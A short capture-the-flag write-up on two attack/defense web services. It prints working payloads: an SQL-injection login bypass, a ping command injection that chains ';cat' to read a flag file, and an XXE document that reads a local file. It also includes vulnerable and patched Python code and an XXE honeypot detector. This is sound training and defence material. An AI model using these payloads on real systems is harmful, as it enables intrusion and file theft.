# wu

* I wasn't sure if **we were** allowed to do a wu, but I wrote a **brief summary** for my own records.

### tldr;

**attack / defense ctf**: every team ran the same 2 web services and had to patch its own instances while attacking the other teams' instances:

#### 🌟 **Mercury Service** (Port 8080)

* **original**: <mark style="color:$warning;">vuln.py</mark> - login endpoint, flag is in <mark style="color:$danger;">`/home/rta_service/flag.txt`</mark>
  * **vulnerability**: sqli login bypass + command injection via <mark style="color:$danger;">`/ping`</mark>
  * **exploit**:
    * log in with the sqli payload <mark style="color:$danger;">`admin' OR '1'='1`</mark> as the username → authenticated, then hit the ping endpoint with a command injection in the `host` parameter
    * target: <mark style="color:$danger;">`/ping?host=127.0.0.1;cat /home/rta_service/flag.txt`</mark> (the `;` terminates the ping command, so `cat` runs in the same shell and the flag comes back in the response)
* **patched**: added session management, input validation, honeypot traps
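Both Mercury bugs and their fixes side by side, as an added example (not the CTF's `vuln.py` and not the author's patch): an in-memory sqlite user table, the string-formatted login query next to the parameterised one, a random-token session store, and a `host` validator that only lets an IP literal or a plain hostname reach an argv-style `ping` call. The table schema, the `ping -c 1` shape and the session layout are assumptions for illustration.

```python
import ipaddress
import re
import secrets
import sqlite3
import subprocess

# Constructed in-memory stand-in for the service's user table (not the CTF's real schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-formatted query: the quote in the username closes the literal and the
    OR '1'='1 tail makes the WHERE clause true for the admin row, password ignored."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone()


def login_patched(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the payload is compared as a plain string and matches nothing."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()


# Minimal session store (assumed design): random bearer tokens instead of trusting
# a client-supplied username on later requests.
SESSIONS: dict = {}

def issue_session(username: str) -> str:
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token

def session_user(token: str):
    return SESSIONS.get(token)


# Hostname grammar (RFC 1123 labels); IP literals are accepted via the ipaddress module.
# Anything with ';', '|', spaces or a leading '-' fails both checks.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(\.{_LABEL})*$")

def is_valid_host(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def ping_command_vulnerable(host: str) -> str:
    """The injectable shape: one string handed to a shell, so ';' starts a second command.
    Returned for inspection only; never execute it."""
    return f"ping -c 1 {host}"


def ping_argv_patched(host: str) -> list:
    """Validate first, then build an argv list; with no shell there is nothing to inject into."""
    if not is_valid_host(host):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", host]


def ping_patched(host: str) -> str:
    """Runs the validated ping without a shell and returns its stdout."""
    result = subprocess.run(ping_argv_patched(host), capture_output=True, text=True, timeout=10)
    return result.stdout
```

The ordering matters: validate, then build argv, then `subprocess.run` without `shell=True`. Validation alone is not enough if the result is still glued into a shell string, and argv alone is not enough if `host` may start with `-` and be parsed as a ping option.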

#### 🌟 **Mars Service** (Port 8080)

* **original**: <mark style="color:$warning;">app.py</mark> - unsafe xml parser with <mark style="color:$danger;">`resolve_entities=True`</mark>
  * **vulnerability**: xxe (xml External Entity) injection via file upload
  * **exploit**: upload a malicious xml (`poc.xml`) that declares an external entity pointing at the flag; the parser expands it and the file contents come back in the response
  * ```xml
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE root [
      <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt">
    ]>
    <root>
      <item>&xxe;</item>
    </root>
    ```
* **patched**: disabled external entities, added input validation

### please don't do this at home.

I left a honeypot and a fake flag up since I knew their attacks were automated against my services. Now I have a bunch of IPs 🥀, please use a VPN.

{% code overflow="wrap" %}

```
...
[2025-09-28 03:00:07] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:16] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
[2025-09-28 03:00:18] ip=[REDACTED] event=HONEYPOT_HIT details=reason=doctype/entity detected
...
```

{% endcode %}
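The Mars fix and the honeypot that produced log lines like the ones above, as an added example (not the CTF's `app.py` and not the author's patch): an upload handler screens the body for any `<!DOCTYPE` or `<!ENTITY` declaration before it reaches a parser, logs a `HONEYPOT_HIT` with the same reason string and hands back a decoy flag, and only DTD-free documents are parsed (with the stdlib parser here; the equivalent lxml setting is `resolve_entities=False`). The sample uploads, the IPs, the decoy flag value and the handler's return shape are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime
from typing import Optional

# Constructed sample uploads. The PoC mirrors the writeup's poc.xml; the flag path is
# only text inside the document and nothing is read from disk here.
POC_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///home/rta_service/flag.txt">
]>
<root>
  <item>&xxe;</item>
</root>"""

CLEAN_XML = b'<?xml version="1.0" encoding="UTF-8"?><root><item>hello</item></root>'

# A benign upload never needs a DTD, so any DOCTYPE or ENTITY declaration (parameter
# entities also start with <!ENTITY) is treated as an attack before parsing begins.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)

FAKE_FLAG = "flag{this_is_a_honeypot}"  # assumed decoy value, not the CTF's flag format


def detect_xxe(data: bytes) -> Optional[str]:
    """Return the honeypot's reason string when the upload carries DTD markup, else None."""
    return "doctype/entity detected" if DTD_RE.search(data) else None


def parse_screened(data: bytes) -> list:
    """Parse an already-screened document and return the <item> texts.
    (With lxml the equivalent hardening is XMLParser(resolve_entities=False, no_network=True).)"""
    root = ET.fromstring(data)
    return [item.text or "" for item in root.iter("item")]


def handle_upload(data: bytes, ip: str, log: list, now: Optional[str] = None) -> dict:
    """Upload handler: trap DTD-bearing uploads (log line + fake flag), parse the rest.
    `now` is injectable so the log line is deterministic; it defaults to the wall clock."""
    now = now or datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    reason = detect_xxe(data)
    if reason is not None:
        log.append(f"[{now}] ip={ip} event=HONEYPOT_HIT details=reason={reason}")
        # Hand the scanner a plausible-looking flag so its automation moves on.
        return {"status": "ok", "output": FAKE_FLAG}
    return {"status": "ok", "items": parse_screened(data)}
```

Screening the raw bytes before parsing is what makes the trap cheap: the attacker's document is never handed to an entity-resolving parser, so the honeypot cannot itself become the XXE sink, and the reason string in the log tells you which payload family hit you without storing the whole upload.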
